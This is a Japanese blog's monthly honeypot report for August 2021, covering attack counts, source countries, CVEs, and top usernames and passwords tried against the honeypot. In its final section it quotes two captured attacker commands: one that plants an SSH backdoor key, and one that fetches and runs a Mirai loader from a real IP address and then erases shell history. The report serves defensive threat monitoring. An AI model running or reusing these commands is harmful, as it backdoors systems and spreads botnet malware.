Midnight Monologues

日々勉強したことを書いてきます

ハニーポット運用(月次報告:2021年8月)

今月のTopics

情報セキュリティ10大脅威 2021 が公開された。 www.ipa.go.jp

スマホ決済の不正利用」(個人編1位)

個人編の「第1位 スマホ決済の不正利用」は周辺諸国と比較してIT化が遅れてきた日本がキャッシュレス決済の推進により注力すべきセクターになる。まだまだ普及しないマイナンバーカードと連携したITサービスの普及に向けて新規に発足したデジタル庁の積極的な活動が高齢化率が世界1位となった日本の巻き返しの起爆剤となってほしい。

「テレワーク等のニューノーマルな働き方を狙った攻撃」(組織編3位)

組織編では「【3位】テレワーク等のニューノーマルな働き方を狙った攻撃」が新規にランクインしている。2020年から始まったリモートワークも体制が整いつつあり、今後はVPNより効率的なサービスのリリースが見込まれると期待したい。

T-Potにて1か月運用した結果を記載する。

今月のChangelog

 更新無し。

前提条件

運用日時:2021年8月1日-2021年8月31日
運用期間:31日

結果

①各ハニーポットで検知したAttack件数
  • T-Potを構成する各ハニーポットへの攻撃件数の一覧を以下に記載する。
No ハニーポット 件数 先月比
1 Cowrie 1875906 159,463
2 Honeytrap 577665 ▲248,060
3 Heralding 505508 ▲682,837
4 Dionaea 455057 101,030
5 Rdpy 94085 ▲12,205
6 Ciscoasa 33828 ▲68
7 Mailoney 16355 1,831
8 Adbhoney 15458 6,191
9 ElasticPot 7550 6,329
10 Tanner 4934 ▲341
11 CitrixHoneypot 1519 ▲110
12 ConPot 1496 ▲86
13 Medpot 142 ▲6
  • Result
    • 他のハニーポットの調査件数が減る中でCowrieへのアクセスが継続して多かった。

②攻撃元の国名と件数(Top 20)
No 攻撃元の国名 件数 先月順位
1 China 730,648 3(↑)
2 Netherlands 567,144 1(↓)
3 United States 492,469 4(↑)
4 Russia 373,435 2(↓)
5 India 99,081 9(↑)
6 France 93,956 6(→)
7 Singapore 85,728 8(↑)
8 Brazil 78,177 13(↑)
9 Indonesia 65,453 17(↑)
10 Japan 61,394 10(→)
11 Vietnam 60,102 11(→)
12 Germany 56,065 15(↑)
13 United Kingdom 55,834 20(↑)
14 South Korea 54,772 14(→)
15 Hong Kong 44,797 圏外(↑)
16 Mexico 35,419 圏外(↑)
17 Taiwan 29,191 圏外(↑)
18 Latvia 26,666 16(↓)
19 Thailand 26,552 圏外(↑)
20 Albania 25,589 圏外(↑)
  • Result
    • 中国が久しぶりに1位に返り咲いた。
    • ロシアが久しぶりに4位へ後退。変わってアメリカが3位に上がった。まるでメダル争いのようだ。

③検知したCVEの脆弱性と件数
  • Suricata(オープンIPS)にて検知した各攻撃の脆弱性の内容を以下に記載する。
No CVE ID Count
1 CVE-2020-11899 1,261,316
2 CVE-2019-12263 CVE-2019-12261 CVE-2019-12260 CVE-2019-12255 419
3 CVE-2019-0708 CVE-2019-0708 CVE-2019-0708 26
4 CVE-2020-11910 1
5 CVE-2021-27561 CVE-2021-27561 CVE-2021-27562 CVE-2021-27561 1

④よく攻撃されるユーザ名
  • ユーザ名でよく攻撃されるキーワード(Top 50)で記載する。
No ユーザ名 件数
1 root 85,576
2 admin 43,240
3 knockknockwhosthere 16,731
4 sh 5,713
5 test 4,854
6 user 4,761
7 sa 4,166
8 nproc 3,685
9 ubuntu 3,673
10 postgres 3,163
11 oracle 2,433
12 git 2,142
13 ftpuser 1,960
14 deploy 1,444
15 hadoop 1,435
16 22 1,386
17 guest 1,337
18 default 1,291
19 minecraft 1,270
20 mysql 1,182
21 support 1,164
22 www 1,124
23 testuser 1,108
24 teamspeak 1,086
25 nagios 957
26 server 942
27 user1 907
28 web 906
29 administrator 884
30 ftp 882
31 (empty) 866
32 www-data 855
33 tomcat 836
34 ts3 812
35 jenkins 744
36 student 715
37 teamspeak3 704
38 test1 695
39 tester 693
40 2Wire 685
41 !root 681
42 dev 674
43 webmaster 667
44 alex 663
45 vbox 647
46 demo 643
47 steam 629
48 ts 605
49 sysadmin 586
50 testftp 577
  • Result
    • knockknockwhosthere(3位)を新規に確認した。

⑤よく攻撃されるパスワード
  • パスワードでよく攻撃されるキーワード(Top 50)を以下に記載する。
No パスワード 件数
1 knockknockwhosthere 16,731
2 admin 14,759
3 123456 11,421
4 123 5,127
5 password 4,426
6 (empty) 4,027
7 nproc 3,681
8 1 3,327
9 1234 3,299
10 12345 3,109
11 root 2,138
12 test 1,851
13 123123 1,442
14 12345678 1,413
15 1qaz2wsx 1,248
16 1q2w3e4r 1,226
17 vizxv 1,218
18 blank 1,052
19 pass 1,009
20 qwerty 983
21 test123 958
22 123456789 952
23 123321 929
24 a 891
25 P@ssw0rd 794
26 123qwe 790
27 111111 751
28 abc123 733
29 p@ssw0rd 725
30 user 714
31 passw0rd 697
32 admin123 633
33 password123 630
34 1234567 629
35 12 535
36 1qaz@WSX 520
37 qwe123 508
38 support 471
39 666666 451
40 pass123 423
41 ubnt 414
42 1q2w3e 412
43 changeme 396
44 qwer1234 393
45 backup 376
46 master 371
47 0 368
48 q1w2e3 366
49 qwerty123 351
50 1q2w3e4r5t6y 332
  • Result
    • ユーザ名と同じknockknockwhosthereというパスワードのアクセスが急激に増加していた。
        SANSのCowrieでも同様のSSH Scanning Activityを観測しているようだ

https://isc.sans.edu/ssh.htmlisc.sans.edu


⑥今月のmasscanとZmap
  • masscanの観測結果は以下の通り。

  • Zmapの観測結果は以下の通り。

  • Result

    • massscanが0件だった。こんな日がくるとは...
    • Zmapは相変わらず多い。

最後に

  • 東京オリンピック開催期間直後の8月9日からuser : knockknockwhosthere/pass : knockknockwhosthereのSSH Scanning Activityが急激に増加していた。何らかの製品に起因するアカウントでもなく、特定の国ではなく各国よりアクセスがみられるためオリンピックに起因したものと推測している。

  • 今月多かったアクセス。

コマンド  :"cd ~ && rm -rf .ssh && mkdir .ssh && echo ""ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr"">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~",
IPアドレス:136.144.41.41    
コマンド  :cd /var/tmp ; curl -s -L -O 31.210.20.142/.billgates/.senpai.loader || wget --no-check-certificate 31.210.20.142/.billgates/.senpai.loader ; chmod 777 .senpai.loader ; ./.senpai.loader ; rm -rf .senpai.loader ; history -c ; rm -rf ~/.bash_history   
接続元   :United States   

このURL配下の.senpai.loaderへアクセスしてみると難読化されていないシェルスクリプトが表示される。
現役のMiraiのBotnetとのこと。

31.210.20.142がDropperサイトになる。.senpai.loaderは264行からなるシェルスクリプトで構成されており、環境に合わせて対応するmalwareがダウンロードされるようだ。

こんな感じのスクリプトが延々と...
危険なので、「でりとっ!」 (ばんばん)